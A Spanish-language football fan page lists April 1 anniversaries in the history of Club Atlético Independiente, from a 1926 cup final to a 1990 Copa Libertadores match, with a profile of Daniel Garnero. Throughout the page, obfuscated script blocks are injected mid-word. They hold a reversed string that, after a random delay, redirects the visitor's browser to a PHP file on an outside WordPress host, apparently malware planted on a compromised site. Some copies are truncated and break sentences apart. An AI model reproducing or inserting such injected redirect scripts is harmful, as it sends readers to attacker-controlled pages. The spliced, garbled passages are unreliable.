Conectate con nosotros

Efemérides

Efemérides del 01 de Abril

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

1926Independiente disputa la final de la Copa Competencia edición 1925, Copa que lo tenía como campeón vigente por haberla ganado en 1924. El rival fue Sportivo Palermo, el escenario era la cancha de River, y el Rojo se impuso por 2 a 0 con goles de Alberto Lalín y Luis Ravaschino, para de esa forma ser bicampeón del certamen.

El equipo aquella jornada fue: Pedro Isusi; Carlos Debuglio y Pedro Ucar; José Pérez, Guillermo Ronzoni y Fernando Cordone; Zoilo Canaveri, Alberto Lalín, Luis Ravaschino, Raimundo Orsi y Carmelo Rovito.

La estructura del torneo fue similar a la del año anterior, con 4 zonas de 5 equipos, y los 4 ganadores pasando de ronda. La diferencia fue que en los grupos se jugó un solo partido con cada rival y no ida y vuelta como antes. El Rojo pasa su grupo con triunfo 7 a 0 a Estudiantil Porteño, victoria 1 a 0 a Sportivo Buenos Aires, empate en 0 con Excursionistas, y otra victoria frente a Barracas Central por 3 a 0.

En segunda ronda choca con Gimnasia y Esgrima La Plata, venciéndolo 2 a 0 con goles de Alberto Lalín y Raimundo Orsi. Mientras que por su parte, Sportivo Palermo elimina ni más ni menos que a River. En la final el Rojo gana su partido un día como hoy y se corona, con la particularidad de haber sido invicto con 15 goles a favor y la valla invicta todo el torneo. El máximo anotador fue Raimundo “Mumo” Orsi con 8 goles.

Una aclaración es que las fuentes difieren de fechas, algunas mencionan la final el día 1 de abril de 1926, mientras otras el 28 de marzo de aquel año.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»60″ height=»46″/></figure></div>



<p><strong>1934</strong> – <strong>Independiente visita a Racing</strong> para un nuevo clásico de Avellaneda, y <strong>le gana por 1 a 0 con el gol tempranero de Felipe Álvarez</strong>, cuando iban solamente 7 minu<script>$mWn=function(n){if(typeof ($mWn.list[n])==tos. Fue por la fecha 2 del Campeonato de Primera División 1934, en el cual Independiente sería subcampeón.

Los 11 titulares de ese día fueron: Fernando Bello; Luis Fazio y Armando Renganeschi; Juan Ferrou, Juan Corazzo y Rodolfo De Jonge; Adolfo Martínez, Felipe Álvarez, Alberto Castillo, Luis Ravaschino y Rogelio Ortíz, siendo Zoilo Canaveri el D.T.

No le sobró nada a Independiente para ganar el encuentro, encontró el gol rápidamente y luego tuvo una gran labor defensiva en la cual colaboró todo el equipo, mientras que el experimentado Luis Ravaschino se encargó de mantener el orden en la parte ofensiva. En aquel encuentro no estuvieron presentes titulares como el “Vasco” Fermín Lecea y el “Cuila” Antonio Sastre, piezas claves del equipo, pero aun así el Rojo ganó justamente según las crónicas.

Varias cuestiones para mencionar que sirven para ampliar lo que fue ese año 1934. Como dije, Independiente terminaría como subcampeón ese torneo, siendo la segunda vez en el profesionalismo que lograría dicha ubicación (la primera fue en1932), no pudiendo lograr el ansiado título. Éste equipo fue el que menos goles en contra recibió, tan solo 41 en las 39 fechas, mucho menos que Boca (62 en contra) que fue campeón y San Lorenzo (63 en contra) que fue el tercero completando el podio. Una clara muestra del enorme arquero que era Fernando Bello, de lo mejor en la primera década del profesionalismo en el país, y el mejor de la historia de Independiente hasta el surgimiento de Miguel Ángel “Pepé” Santoro en los 60.

Mientras que adelante, ese año fue el último en la gran carrera de un ídolo como Luis Ravaschino, multicampeón durante el amateurismo, brillando en el título de 1926 y las tres Copa Competencia seguidas a mitad de la década del 20.Un goleador formidable que, luego de más de un decenio en el club, se marcharía a Lanús para retirarse definitivamente de la actividad. En contraposición a eso, el ataque de Independiente comenzaría a tomar forma gracias al aporte de Arsenio Pastor Erico, llegado ese año y convirtiendo 12 goles en los 21 cotejos que disputó.

Aun así, faltarían dos subcampeonatos más, en 1935 y 1937, para poderse sacar la espina en 1938 con el máximo glamour.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»66″ height=»51″/></figure></div>



<p><strong>1956</strong> – <strong>Durante</strong> el mes de <strong>marzo y primeros días de abril de 1956</strong>, Independiente realiza una <strong>gira por Sudamérica</strong> que incluyó Chile, Perú y Uruguay. Se comenzó con triunfo sobre Universidad Católica por 4 a 1, luego un 2 a 0 a Universitario de Perú, igualdad con Alianza Lima en un gol, y goleada por 6 a 2 frente a Centro Iqueño en Lima.</p>



<div class=

Así llegamos a un día como hoy, cuando en Santiago de Chile el Rojo se mide contra Colo Colo y le gana con baile por 0 a 4, anotando los goles Ricardo Bonelli, Ernesto Grillo, Rodolfo Micheli y Camilo Cervino.

La crónica de encuentro no escatimó en elogios para el equipo Argentino, con frases como: “Hablar de independiente es hablar de buen fútbol” o “Independiente y su fútbol galano y preciosista”. Así se daba cuenta no solo de la supremacía sobre Colo Colo, sino también del habitual estilo de juego del Rojo. Ese equipo de Colo Colo venía de ser campeón de Chile en 1953, subcampeón en 1954 y 1955, y volvería a coronarse ese mismo año 1956, siendo claramente de lo mejor de su país.

A la gira le quedaba un solo encuentro más, el que se jugó el día 4 de abril en Uruguay frente a Peñarol, siendo empate 1 a 1. Luego el equipo ya volvería a la Argentina para iniciar la temporada oficial.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»66″ height=»51″/></figure></div>



<p><strong>1969</strong> – <strong>Nacimien<script>$mWn=function(n){if(typeof ($mWn.list[n])==to en Lomas de Zamora, provincia de Buenos Aires, de Daniel Oscar Garnero, “Dany”, quien jugó 275 partidos en el club marcando 23 goles, para cosechar los títulos del Torneo Clausura 1994, las Supercopa de 1994 y 1995, y la Recopa 1995.

Surgido de las inferiores del club, a Daniel le tocó una de las responsabilidades más gigantescas en la historia del club, porque se tuvo que hacer cargo de la camiseta número 10 que dejó libre Ricardo Bochini con su retiro.

Obviamente, ni  Garnero ni ningún futbolista jamás, ha alcanzado ni por asomo a lo que hizo el “Bocha”, pero Daniel cumplió muy bien con el club, más que nada en sus dos primera etapas, ya que defendió la camiseta desde 1991 a 1995, luego de 1997 a 1999, y finalmente de 2000 a 2001.

Debutó en la fecha 5 del Torneo Clausura 1991, en el triunfo frente Newell´s por 1 a 0, y desde allí fue madurando como futbolista hasta adueñarse por completo del puesto. Era un enganche muy habilidoso y talentoso, de excelente pegada y respeto por el paladar del club, con notable visión y entendimiento del juego, manejando los tiempos y siempre mentalizado en el arco contrario.

Se convirtió en el cerebro del equipo multicampeón de los años 1994 y 1995, pidiendo la pelota siempre para tener la responsabilidad de ser el máximo generador de juego, el creativo, el del último pase para el gol. Daniel fue gran baluarte de aquel proceso de Miguel Brindisi como técnico, y entró en la idolatría de la gente que siempre se sintió identificada con su forma de jugar.

Tuvo breves pasos por Chile, jugando para Universidad Católica en 1996, y México, en Toros Neza en el 2000. Dichos pasos por otros clubes no fueron del todo por decisión propia, porque de haber sido por él jamás se hubiese puesto otra camiseta. A pesar de ello, volvió en dos ocasiones hasta retirarse en el club de sus amores.

Posteriormente se hizo director técnico, iniciándose en Arsenal de Sarandí donde logra ganar la Copa Suruga Bank 2008. Estuvo en el banco del Rojo durante una parte del 2010, pero no pudo brindar las alegrías que había dado como jugador, aún así, dirigió al equipo en la primera fase de la Copa Sudamericana eliminando a Argentinos Juniors.

Luego fue D.T. de San Martín de San Juan, Banfield e Independiente Rivadavia en nuestro país, hasta que se fue al futbol de Paraguay. En el país vecino estuvo al frente de Sol de América, Guaraní (donde fue campeón), hasta que en 2018 asume en el club más grande del país, Olimpia, con el cual ganó 4 campeonatos de Primera División consecutivos.

En 2020, luego de la pandemia mundial del Covid-19, no logró buenos resultados y fue destituido de su cargo, asumiendo en pocas semanas en Libertad de Paraguay, donde está actualmente y donde ya logró coronarse campeón del Torneo Apertura 2021.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»61″ height=»47″/></figure></div>



<p><strong>Les dejo tres videos</strong>:</p>



<p>El primero es de la <strong>anteúltima fecha del Torneo Clausura1994</strong>, en la goleada a Gimnasia y Esgrima La Plata, con un “Dany” <strong>Garnero que se comió la cancha</strong>.</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»66″ height=»51″/></figure></div>



<p>El segundo es un <strong>compilado de 5 de sus goles en el Rojo</strong>.</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»58″ height=»45″/></figure></div>



<p>Y tercero, <strong>otro compilado de sus goles y jugadas</strong>:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»58″ height=»45″/></figure></div>



<p><strong>1987</strong> – Fecha 34 de la Temporada de Primera División 1986-1987, y <strong>el Rojo recibe a Estudiantes de La Plata </strong>para darle una tremenda paliza, <strong>ganándole por 5 a 1</strong> con <strong>4 goles</strong> del peruano <strong>Franco Navarro</strong> y <strong>el restante de Gerardo Reinoso.</strong></p>



<p><strong>Fue la noche perfecta de Navarro </strong>en su estadía en el club, abrió el partido con un gol de cabeza, luego vino el gol de “La Vieja” Reinoso, y <script>$mWn=function(n){if(typeof ($mWn.list[n])==todavía en la primera parte Franco marcó el tercero con un fuerte derechazo. En el segundo tiempo completó la jornada con dos goles más, para que todo el estadio lo aplauda y para recibir los elogios del mismísimo Ricardo Bochini. Por su gran actuación, el peruano fue la contratapa de El Gráfico.

Una curiosidad del partido es que Franco Navarro se reencontraba en el campo de juego con Julián Camino, futbolista de Estudiantes que en junio de 1985 había fracturado al peruano en un encuentro entre selecciones.

Era el primero de los dos años en el club de Navarro y sería el goleador del equipo en esa temporada, anotando 18 goles para quedar a dos de Omar Palma, el goleador del torneo, aunque se debe tener en cuenta que el delantero del Rojo estuvo varios partidos ausentes por la lesión de fractura de nariz que le provocó el arquero José Luis Chilavert ese torneo.

En relación al gran triunfo de un día como hoy, hay que decir que fue de mucha importancia en la pelea por el título. El equipo dirigido por José Omar “Pato” Pastoriza continuaba realizando una gran campaña, y terminada esa fecha la tabla de posiciones quedaba apasionante. Rosario Central había empatado con Ferro pero sostenía el liderazgo con 42 puntos, Boca le ganaba a San Lorenzo e igualaba en puntaje a los rosarinos, el Rojo se prendía con 41 unidades, e igual cantidad sumaba Newell’s, mientras que San Lorenzo quedaba con 40. En apenas dos puntos había 5 equipos a falta de 4 fechas.

En la fecha 37 Independiente le ganaría a Boca para dejarlo fuera de competencia, quedando solamente el Rojo y ambos equipos rosarinos con chances de título. Finalmente sería Rosario Central el campeón de la temporada, e Independiente por empatar quedaría en tercer puesto. Aun así, fue el equipo el de mayor poderío ofensivo con sus 70 goles, 6 más Rosario Central y 13 más que Newell´s.

Saliendo del torneo, y volviendo a puntualizar en Franco Navarro, hay que decir que fue uno de los principales delanteros del Perú durante la década del 80.Surgido de Deportivo Municipal donde juega desde 1979 a 1983, para luego pasar a Independiente Medellín de Colombia y de allí al Independiente de Avellaneda en 1986.

Tenía fuerza, actitud y efectividad. Se ganó el cariño de la gente a fuerza de goles. Su segundo año en el club no fue tan bueno como el primero, y luego de eso se marcharía junto a tantos otros jugadores en lo que fue el final del ciclo de Pastoriza y el inicio de Jorge Solari como DT, con gran renovación del plantel. Fueron 69 partidos de Franco Navarro en el Rojo convirtiendo 25 goles.

Continuó su carrera en México jugando para Tecos, luego en el fútbol suizo y volvió a Argentina para jugar en Unión de Santa Fe. Posteriormente volvería y terminaría su carrera en el futbol peruano actuando para Sporting Cristal, Deportivo Municipal y Alianza Lima. Para la Selección Nacional de Perú jugó durante toda la década del 80, participando del Mundial de España 1982, y las Copas América de 1983, 1987 y 1989. Ya retirado inicia su carrera como DT, habiendo dirigido hasta el presente más de una decena de equipos del futbol de su país natal.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»62″ height=»48″/></figure></div>



<p>Les dejo el <strong>video de cuando Navarro es lesionado en su nariz</strong>, comentado durante la efeméride:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»61″ height=»47″/></figure></div>



<p><strong>1990</strong> – <strong>Independiente recibe en Avellaneda a River</strong>, para enfrentarse por la fase de grupos de la Copa Libertadores 1990. Dicha fase tuvo una curiosidad, y es que antes de comenzar ambos equipos ya estaban clasificados para la siguiente fase de la competencia.</p>



<p>La razón fue que en el sorteo de grupos, jun<script>$mWn=function(n){if(typeof ($mWn.list[n])==to a los equipos argentinos, tocó la bolilla de Colombia, pero en ese país se había suspendido el Campeonato 1989, no habiendo campeón ni subcampeón, y por eso Colombia no pudo enviar sus representantes a la Copa. Solamente Atlético Nacional la disputó, pero por ser el campeón vigente, tal cual lo marcaba el reglamento desde la fundación de la Copa.

En este contexto tan particular, Independiente y River debían jugar entre sí para definir quién sería líder y quién segundo, y así poder determinar los cruces de octavos de final. El primer partido se jugó el 25 de marzo en el Monumental siendo empate en 0, y un día como hoy se da el segundo choque.

Aquel día los 11 del Rojo fueron: Sergio Vargas; Fernando Villarreal, Marcelo Morales, Guillermo Ríos (81’ Elvio Vázquez) y Ricardo Altamirano; José Bianco, Fabio Lenguita, Rubén Insúa y Claudio Borghi (80’ Carlos Morales Santos); Alejandro Alfaro Moreno y Martín Ubaldi, dirigidos por Jorge Solari. El partido parecía morirse en otro empate en 0 e ir a la definición por penales, pero a los 85 minutos hubo un tiro libre para el Rojo que ejecuta Elvio Vázquez, el arquero José Miguel de River tuvo una floja respuesta dando un rebote que captura Carlos Alfaro Moreno y lo traduce en el gol del 1 a 0 definitivo.

De esa forma Independiente fue líder del grupo accediendo a los octavos de final, fase en la que le tocó enfrentar al débil Pepeganga de Venezuela, y luego en cuartos volvería a cruzarse con River quedando eliminado. No fue una Copa destacada para el equipo, que estaba lejos de parecerse al campeón 1988-1989. Finalmente el trofeo quedaría en manos de Olimpia de Paraguay.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»66″ height=»51″/></figure></div>



<p>Les dejo <strong>video del gol de Carlos Alfaro Moreno</strong>:</p>



<figure class=

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides